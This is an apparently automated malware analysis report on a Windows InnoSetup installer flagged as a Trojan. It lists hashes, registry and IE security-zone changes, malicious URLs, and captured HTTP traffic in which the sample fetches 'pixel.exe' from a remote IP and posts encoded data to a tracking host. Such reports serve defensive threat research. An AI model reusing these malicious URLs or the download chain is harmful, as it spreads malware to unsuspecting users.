Installer.Win32.InnoSetup.2_dc5a034db8

by malwarelabrobot on April 25th, 2016 in Malware Descriptions.

Installer.Win32.InnoSetup.2.FD, Trojan.Win32.Sasfis.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Installer

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: dc5a034db8ab7049dc5f37a17ebcb9d9
SHA1: 8dd14e0e247b6f9cc39daf7a631941867bd114a2
SHA256: 0fab15afe571c86fc4660874b02bcd4dfe3c71dd99831c7974a0e87ed27b7adc
SSDeep: 24576:kiTAj2NdhIAtyY5pXKBOTH/XXvfmUDDhjqUPhZHZxWPY4h/2:kiMG9tyoxA8HfnmUPhjRbZxT4h
Size: 1010192 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: adsafiliados
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit

Summary:

Installer. An installation package.

Payload

No specific payload has been found.

Process activity

The Installer creates the following process(es):

%original file name%.exe:824

The Installer injects its code into the following process(es):

%original file name%.exe:1124

Mutexes

The following mutexes were created/opened:

__DDrawCheckExclMode__
__DDrawExclMode__
DDrawDriverObjectListMutex
DDrawWindowListMutex
CTF.TMD.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Layouts.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Asm.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Compart.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.LBES.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
RasPbFile
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
ShimCacheMutex
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex

File activity

The process %original file name%.exe:1124 makes changes in the file system.
The Installer creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\in1A1AEB34\57B0B0FE_stp.DAT.part (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013C71C.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\locale\DLM\EN.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\ProgressBarD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013BEEE.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\locale\DLM\ES.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Color_Button.png (385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\csshover3.htc (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\BGD.jpg (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\mainDlm.css (8 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adswarez[1].txt (217 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\progress-bg2.png (978 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Resume_Button.png (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\button.css (417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Close_Hover.png (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Close.png (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Color_Button_Hover.png (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\in1A1AEB34\57B0B0FE_stp.DAT (1960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\logo4[1].png (1787 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\sponsored.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\progress-bar.css (506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\locale\DLM\PT.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\checkbox.css (190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\form.bmp.Mask (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\bootstrap_24546.html (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\ProgressD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\progress-bg.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013C72B.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Loader.gif (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\browse.css (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Welcome_BG.jpg (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\ie6_Dlm_main.css (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\button-bg.png (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Pause_Button.png (577 bytes)

The Installer deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\0013C71C.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\bootstrap_24546.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013BEEE.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013C72B.log (0 bytes)

Registry activity

The process %original file name%.exe:824 makes changes in the system registry.
The Installer creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 6F 92 D1 4D 3B D1 48 F9 7F 20 30 3A FD 54 C9"

The process %original file name%.exe:1124 makes changes in the system registry.
The Installer creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "708992537"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E E7 74 19 0A CA AD EA FD 6F 52 68 D1 FE 3D 99"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Installer modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Installer modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Installer modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Installer deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5	File path
399f8cefebd04b4bcc8c5db0b033aa69	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\in1A1AEB34\57B0B0FE_stp.DAT

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: adsafiliados
Product Name: Installer Setup
Product Version: 1.0.5.a0.1_54944
Legal Copyright: adsafiliados
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.5.a0.1_54944
File Description: Installer Setup
Comments: This installation was built with Inno Setup.
Language: Language Neutral

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
CODE	4096	40240	40448	4.64999	dbda5ee849ef82a713855f811e7bfc14
DATA	45056	592	1024	1.90742	1ee71d84f1c77af85f1f5c278f880572
BSS	49152	3724	0	0	d41d8cd98f00b204e9800998ecf8427e
.idata	53248	2384	2560	3.07115	bb5485bf968b970e5ea81292af2acdba
.tls	57344	8	0	0	d41d8cd98f00b204e9800998ecf8427e
.rdata	61440	24	512	0.14174	9ba824905bf9c7922b6fc87a38b74366
.reloc	65536	2244	0	0	d41d8cd98f00b204e9800998ecf8427e
.rsrc	69632	11264	11264	3.10173	85e26c316dd351fa3b841914fb7ded69

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 23
da572766f44e7b5b01f230f184e2be6b
9bd659f802479a9bf3ccf7545ef9a1e4
28422dba23ed1f0a4e7be424f69bfc09
20af91ce088b16d260ed76a2614037b0
5c58c121061e8f79f3885326d8c5cb29
f1103ef51e63250cd835b8ad507dd24c
d0d8cec2d646fa7a0fb6c79d44e3b960
f762441fab5467efeabfaea3685f1806
6899505489192a5a9df7b30ee0babfaf
8ba398b18d09d8415a60149a70c535bd
eaeed4183ff17edc4384e353f43a76e1
a7a4010bdab7a0a66b95cb20b9fa0c3d
b3d549f05a832980a905d1b3a9f2a5ae
415bf2b54ca511831edeb9c21e2645e4
296174c8438a132b37a6b89d2dd61a50
4954d37f1446ae2dca81f1695d18190f
b162d3e830ee3694a36cf947f0d77709
1d5a622fedabcbd02b2677486b01fd4a
992848a79a13ecc7b491b8723311b73c
941bc0a52a496fe0ee77cece39d37d45
0869e43da1d44f256fa7fdf02f5743ad
c088309e24bea1c8893ed8b009d1e3ec
7f1ba36097afd10c60a316a734514982

URLs

URL	IP
hxxp://os.fodidodasal.com/adsafiliados/?v=6.0&c=1856168701&t=1319218	54.194.194.239
hxxp://ad5.adswarez.com/downloadimage/20467/16/b021a2773080bd3c2b70eee38c21b2a9/logo4.png?logotipo=automatico&uo=hxxp://www.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&nada=true	104.28.16.74
hxxp://46.137.105.35/?v=2.0&subver=6.21&pcrc=913192198
hxxp://ad5.adswarez.com/comp/20467/16/QI9-uGkV1Y_pjD-dhOWilOdkGndKL1_G0wvjKuiI9nlNLUU4pmpMhogeyuNifkC6Nq_PTtkFpY9ygnU2d05_TCuqPFhlsXDj8DBs8sioMCQA7vRxVe-NyOgoKBh4RLfpl2z9JuG4tReOENNlFB_ineOdZW1xahChJDULvYreWMCbRcOJt4h1eBa2JQAB1HiXbGEFLQhNFQJVrRhs6C02zIjDQYRHYjKd8PbqPVDkeUNb40DiLasJvjbov5hoyp7SMl9JoyGzaC1mErOPmBNShfpAc1e73axqFBMMDVHaY_M.exe?plataforma=c1&&uo=hxxp://www.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&ud=hxxp://www.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html	104.28.16.74
hxxp://162.243.100.13/?key=QI9-uGkV1Y_pjD-dhOWilOdkGndKL1_G0wvjKuiI9nlNLUU4pmpMhogeyuNifkC6Nq_PTtkFpY9ygnU2d05_TCuqPFhlsXDj8DBs8sioMCQA7vRxVe-NyOgoKBh4RLfpl2z9JuG4tReOENNlFB_ineOdZW1xahChJDULvYreWMCbRcOJt4h1eBa2JQAB1HiXbGEFLQhNFQJVrRhs6C02zIjDQYRHYjKd8PbqPVDkeUNb40DiLasJvjbov5hoyp7SMl9JoyGzaC1mErOPmBNShfpAc1e73axqFBMMDVHaY_M&ud=http://www.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&n=VMware-vSphere-6.0-Full-Keygen
hxxp://rp.Fodidodasal.com/?v=2.0&subver=6.21&pcrc=913192198
hxxp://os.Fodidodasal.com/adsafiliados/?v=6.0&c=1856168701&t=1319218
img.fodidodasal.com	199.201.110.78

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /downloadimage/20467/16/b021a2773080bd3c2b70eee38c21b2a9/logo4.png?logotipo=automatico&uo=hXXp://VVV.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&nada=true HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: ad5.adswarez.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sun, 24 Apr 2016 01:12:23 GMT

Content-Type: image/png

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=da1ba1e8871c52d5968eb36e219d271491461460342; expires=Mon, 24-Apr-17 01:12:22 GMT; path=/; domain=.adswarez.com; HttpOnly

X-Powered-By: PHP/5.5.7

CF-Cache-Status: MISS

Expires: Sun, 24 Apr 2016 05:12:23 GMT

Cache-Control: public, max-age=14400

Server: cloudflare-nginx

CF-RAY: 2985afc602132b21-WAW
2029...PNG........IHDR...n...n.....I9.... .IDATx..}Y.e.u...........M5.
d7).....cIv,Y..(.!..b......`.F.#F....o..........8.....<.6,Y.D."eN..
=...... .5...[M.....;.S.j..{..U...o.X[o.../_=........teskg..........o.
..........q.....P.D. H........g....C..|:i..{.._...n>.....7.......L.
..t..R.S=.....>....}..O..{............;?...F.....@.*...",..^......g
.D3#.r!.9D.4b.....h.........{.q....o.6]..G...._...?~.......j....z.".".
n.....%%........R.........XB8'|^].>.TM.Z.q,.........G_.../|.n..sc.#
....6...}............s.9U..D....2"..n.S....i...Z......3..e.H..........
b.].}..l..........w.u..G..h.......?.u...H......@......"[email protected]#.l..
..HI....}...D..rH6....%[(e..k..S.6../....>:(?...~.S.....8..U.`....{
.H.tU.%..L....O.8.S..\.AFJ...`..B.".OJ.^.....{.?x..GvB].. ./L.........
E.)"$......PC...... ...R. Nf.....#.1.bHe.Dp...&.....C."..#..`..q.2|...
...b.'>s..w$4.?F.I.Q......@).9A.Q.0..O&o..X.z&W.. ......a.. .K....E
?....n..~x...u..1.......Q?k]...$...!......Ej43.......K\..,,..D7.uK....
.'b.Y.~..$......<[email protected].*....vu.D./......uk%...f..*X'..H..
i......J./...G.=..x......=.(......0R.*2.j2...k..pX"`]V...,[email protected]..
...N.....i.g-.&^..E.v[.H......wm...J..rH... .qA....*.L.....]l.z.f..2.%
.T.G2..]K..8.`"..........G....&.9...X.4D@2..,.........V...I.G.>.$s.
.d$Q..([email protected]/M....<..........n...73#=AXnvv
......J4........h.$...]...]b[[email protected]..<.(O...BL..011.P.Uyz'........
........n6....."1.g..@...;L..g..V..O.k.52^o..G.....7j.o.C..(..)I..l.&g
t;....Et.I&&.....K....K_...?.u...{7f...z[,..{..>@.e5.......nZ..<<< skipped >>>

HEAD /comp/20467/16/QI9-uGkV1Y_pjD-dhOWilOdkGndKL1_G0wvjKuiI9nlNLUU4pmpMhogeyuNifkC6Nq_PTtkFpY9ygnU2d05_TCuqPFhlsXDj8DBs8sioMCQA7vRxVe-NyOgoKBh4RLfpl2z9JuG4tReOENNlFB_ineOdZW1xahChJDULvYreWMCbRcOJt4h1eBa2JQAB1HiXbGEFLQhNFQJVrRhs6C02zIjDQYRHYjKd8PbqPVDkeUNb40DiLasJvjbov5hoyp7SMl9JoyGzaC1mErOPmBNShfpAc1e73axqFBMMDVHaY_M.exe?plataforma=c1&&uo=hXXp://VVV.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&ud=hXXp://VVV.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html HTTP/1.1

Accept: */*

Host: ad5.adswarez.com

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)

Content-Length: 0

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 302 Found

Date: Sun, 24 Apr 2016 01:12:28 GMT

Content-Type: text/html

Connection: keep-alive

Set-Cookie: __cfduid=d33cf14d07fcd194a68138e7ca27ce2d11461460346; expires=Mon, 24-Apr-17 01:12:26 GMT; path=/; domain=.adswarez.com; HttpOnly

X-Powered-By: PHP/5.5.7

Location: hXXp://162.243.100.13/?key=QI9-uGkV1Y_pjD-dhOWilOdkGndKL1_G0wvjKuiI9nlNLUU4pmpMhogeyuNifkC6Nq_PTtkFpY9ygnU2d05_TCuqPFhlsXDj8DBs8sioMCQA7vRxVe-NyOgoKBh4RLfpl2z9JuG4tReOENNlFB_ineOdZW1xahChJDULvYreWMCbRcOJt4h1eBa2JQAB1HiXbGEFLQhNFQJVrRhs6C02zIjDQYRHYjKd8PbqPVDkeUNb40DiLasJvjbov5hoyp7SMl9JoyGzaC1mErOPmBNShfpAc1e73axqFBMMDVHaY_M&ud=http://VVV.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&n=VMware-vSphere-6.0-Full-Keygen

Server: cloudflare-nginx

CF-RAY: 2985afdd33522b21-WAW

HTTP/1.1 302 Found..Date: Sun, 24 Apr 2016 01:12:28 GMT..Content-Type:
 text/html..Connection: keep-alive..Set-Cookie: __cfduid=d33cf14d07fcd
194a68138e7ca27ce2d11461460346; expires=Mon, 24-Apr-17 01:12:26 GMT; p
ath=/; domain=.adswarez.com; HttpOnly..X-Powered-By: PHP/5.5.7..Locati
on: hXXp://162.243.100.13/?key=QI9-uGkV1Y_pjD-dhOWilOdkGndKL1_G0wvjKui
I9nlNLUU4pmpMhogeyuNifkC6Nq_PTtkFpY9ygnU2d05_TCuqPFhlsXDj8DBs8sioMCQA7
vRxVe-NyOgoKBh4RLfpl2z9JuG4tReOENNlFB_ineOdZW1xahChJDULvYreWMCbRcOJt4h
1eBa2JQAB1HiXbGEFLQhNFQJVrRhs6C02zIjDQYRHYjKd8PbqPVDkeUNb40DiLasJvjbov
5hoyp7SMl9JoyGzaC1mErOPmBNShfpAc1e73axqFBMMDVHaY_M&ud=http://www
.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&n
=VMware-vSphere-6.0-Full-Keygen..Server: cloudflare-nginx..CF-RAY: 298
5afdd33522b21-WAW..

<<< skipped >>>

HEAD /?key=QI9-uGkV1Y_pjD-dhOWilOdkGndKL1_G0wvjKuiI9nlNLUU4pmpMhogeyuNifkC6Nq_PTtkFpY9ygnU2d05_TCuqPFhlsXDj8DBs8sioMCQA7vRxVe-NyOgoKBh4RLfpl2z9JuG4tReOENNlFB_ineOdZW1xahChJDULvYreWMCbRcOJt4h1eBa2JQAB1HiXbGEFLQhNFQJVrRhs6C02zIjDQYRHYjKd8PbqPVDkeUNb40DiLasJvjbov5hoyp7SMl9JoyGzaC1mErOPmBNShfpAc1e73axqFBMMDVHaY_M&ud=http://VVV.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&n=VMware-vSphere-6.0-Full-Keygen HTTP/1.1

Accept: */*

Host: 162.243.100.13

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)

Content-Length: 0

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 24 Apr 2016 01:12:28 GMT

Server: Apache/2.4.7 (Ubuntu)

X-Powered-By: PHP/5.5.9-1ubuntu4.3

Content-Disposition: attachment; filename=pixel.exe

Content-Description: File Transfer

Content-Length: 60658

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: application/force-download

GET /?key=QI9-uGkV1Y_pjD-dhOWilOdkGndKL1_G0wvjKuiI9nlNLUU4pmpMhogeyuNifkC6Nq_PTtkFpY9ygnU2d05_TCuqPFhlsXDj8DBs8sioMCQA7vRxVe-NyOgoKBh4RLfpl2z9JuG4tReOENNlFB_ineOdZW1xahChJDULvYreWMCbRcOJt4h1eBa2JQAB1HiXbGEFLQhNFQJVrRhs6C02zIjDQYRHYjKd8PbqPVDkeUNb40DiLasJvjbov5hoyp7SMl9JoyGzaC1mErOPmBNShfpAc1e73axqFBMMDVHaY_M&ud=http://VVV.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&n=VMware-vSphere-6.0-Full-Keygen HTTP/1.1

Range: bytes=0-60657

Accept: */*

Host: 162.243.100.13

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sun, 24 Apr 2016 01:12:29 GMT

Server: Apache/2.4.7 (Ubuntu)

X-Powered-By: PHP/5.5.9-1ubuntu4.3

Content-Disposition: attachment; filename=pixel.exe

Content-Description: File Transfer

Content-Length: 60658

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: application/force-download

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^...........0.......p....@.........
.................................................................t....
.......@..............................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected]\......
.....v..............@....ndata...................................rsrc.
[email protected]..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

POST /?v=2.0&subver=6.21&pcrc=913192198 HTTP/1.1

Accept: */*

Host: rp.Fodidodasal.com

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)

Content-Length: 2400

Cache-Control: no-cache

...4.....>.K..~.........u..i.Z..*...C3E

....x".....E.H\!oZ...;....Rl......Q.8....E .1......D........#..!!.'.E...x.=..%..?PX.N;/)..@...=.....V.h.(.3F5.B..cy.2.Q.y.V.~$.15}|gC.%..b.)....%..,.Oj,..:....^ ....2.vP.<....z..*.^x....v...E_....O..T..y...U....M......[..X0..~....;...5.W.p.gE9`....z;Ao)..'.\.fn*.j..._.$...7}.~P1..l....R..G)..x1.<......q...\.Svc$.M.`........sP...0R}u..RX....j...`c.i..%.....fQZRYt....r,k...!..T...>...`..d.{5..*.Z...
......F.6...x.....|
./g..c...........J.-...$\a.E.)..l.......Kc..C. ..&...C..\.

..m|9F...,..O.T.-V.u...wL.....3...`.......i..*,;.{....n.&.?.....1..."..bB....o..5......#..Q..-I.....w...*|..6.8.v6....Y....1y..a1c.B...En.q.Me39#.o.'.......:)...w.&..v.pT.....U...FW# .....r|.d..TS=..3......:..b.OT.b....#.y .......:.>..e*P.../Y$..-.....r.l.b.PYh.X../..l .b.8Zmp.N.g.r%4..<.7.,h...3B.G....".s.......6...P..d2}*.Y...

.X....."......"N_...-F|.4....\,.>...\.N.]v...8.....#..hU.........%...{....o.M-.AR...Um...r..WD..IEk...D.3...M........^.P..U..r.....a..

K.~SC2...t.@,.e4~-{.F?....:m....T...F.......y..N...w....0....B.........N...f......Sc5...z..sc..=9....vb..b.3.}ZF.r.............}.....w....2.."....0... ..-......|/..._L.C#.....h...y...a..N....;...6m....T.v...)....z..].....k.... ..T..x...aT. O.4....&.O.]..m..p......d...{.>..x.V..v ...jE..F..j..U..a.k|.28y
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Sun, 24 Apr 2016 01:12:24 GMT

Server: TornadoServer/4.0.2

Content-Length: 4

Connection: keep-alive

DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Sun
, 24 Apr 2016 01:12:24 GMT..Server: TornadoServer/4.0.2..Content-Lengt
h: 4..Connection: keep-alive..DONE..

POST /adsafiliados/?v=6.0&c=1856168701&t=1319218 HTTP/1.1

Accept: */*

Host: os.Fodidodasal.com

User-Agent: ICAS

Content-Length: 1264

Cache-Control: no-cache

.I..~...$$......_,.p.u.....D.Z4.ir:..w..m...X......B.y..w.#.2g..Y}d..O..3V#.,.1.....?...Q...b..\.4.....5.J...a6_q.-."Aw...eS...G.&....l...p....&.....&...Xh...hT........{-..@./..Z...C..{W.S.XpY%V.Py...."e"...%.'/s7!6.....G.?...-..h.......m.......*H..o...d$#q.,_...Q.wnE.....tp.t..i.:
.DE........l..F...
.DV.,.p.3:..P.*.|~gWv.k...*.a..........y9...6.m..[6..B.3)X..ms.U1.3... |Zl...... .pg'.m ..8.;...?....B].4..|e.EI2......:....p2..h..UpQb.]L...H..F...o..Vg.....m...kZ.p........$...m..N.'%x.H...h...#.c.......'*Z.j...vx.....
._q../_C.G..r.7......4r[....t..,sS\.....>#.qn(q.........l......{.:m.A...J.....E...M.....n.\.l..vx....)?.pf....i..&..6.C...I..Q..9w...S.M.I.W...<XC..)`...'.Bq..!...Uj...=n......e.z...f.1? .N. ..X.k~=Q.r......y..)..T..N....1.....R._U...

5E(<...avr!.l@C...)<...EP8.. z1?/3.....mX..........j..
..h...axx!....B..UR.I6.T..,...6....K~~......9pB7.Lo..N....Th..t._y2w.*...W...Wg.A.')...*.&.(.QR.........cu..r?.....%.....I...Z...8".5....Y?.U.@..,x..x...1.5..MCf.^....i.......$.....z.\.......j.....N.,.9... .s=*....m.`..
.R....i-....qY.Y..|....C..N.$..........QR...........w......g....]..v'[..gp.k...{-.{....g.[T..............[....I._u.n/.E.....G.T,N..Y0.\./k..;...F.$/...UiOc......n&.&.8..3.4...a'.k....Q.......{.....5...<b4X......s.)...h...kS.
HTTP/1.1 200 OK

Cache-Control: no-cache

Content-Type: text/plain

Date: Sun, 24 Apr 2016 01:12:22 GMT

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Server: nginx

X-ICSCT-CC: UA

X-ICSCT-CITY: Kharkiv

